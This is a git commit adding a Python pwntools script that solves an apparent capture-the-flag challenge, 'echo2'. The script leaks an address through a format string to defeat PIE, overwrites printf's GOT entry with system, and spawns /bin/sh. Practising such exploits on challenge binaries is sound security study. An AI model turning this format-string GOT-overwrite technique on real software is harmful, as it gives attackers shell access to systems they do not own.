Finished PIE/echo2

2021-09-14 16:11:29 +08:00
parent 4748b44b62
commit e06705161d
2 changed files with 24 additions and 0 deletions
--- a/PIE/echo2/answer.py
+++ b/PIE/echo2/answer.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./echo2')
+elf = ELF('./echo2')
+
+query_payload = "%41$lld"
+p.sendline(query_payload)
+echo_ret_addr = int(p.recvuntil("\n"))
+program_base = echo_ret_addr - 0xa03
+
+printf_got = elf.got['printf'] + program_base
+system_plt = elf.plt['system'] + program_base
+
+payload = fmtstr_payload(6, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+